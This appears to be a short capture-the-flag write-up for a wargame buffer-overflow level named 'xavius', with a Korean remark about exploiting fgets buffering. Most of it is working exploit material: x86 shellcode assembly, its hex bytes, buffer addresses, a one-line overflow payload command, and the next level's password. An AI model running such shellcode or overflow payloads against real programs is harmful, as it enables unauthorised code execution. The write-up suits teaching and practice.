* fgets가 버퍼링을 사용한다는 것을 이용.

<shell.S>

	.section .text
	.globl _start

	_start:
        	xor %eax, %eax
        	push %eax
       		push $0x73736170
        	push $0x2d796d2f
        	push $0x6e69622f
        	push %eax
        	lea 4(%esp), %ebx
        	push %ebx
        	movb $11, %al
        	mov (%esp), %ebx
        	lea (%esp), %ecx
        	xor %edx, %edx
        	int $0x80

</shell.S>

<shellcode>

	\x31\xc0\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x50\x8d\x5c\x24\x04\x53\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80

	length: 36

</shellcode>

<value of stdin>

	0x8049a3c

</value of stdin>

<real buffer of fgets>

	0x40015000

</real buffer of fgets>

<command>

	echo -n "$(for x in `seq 1 44`; do printf "\x90"; done)$(printf "\x30\x50\x01\x40")$(printf "\x31\xc0\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x50\x8d\x5c\x24\x04\x53\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80")$(for x in `seq 1 172`; do printf "\x90"; done)"| ./xavius

</command>

<next>

	id: xavius
	pw: throw me away

</next>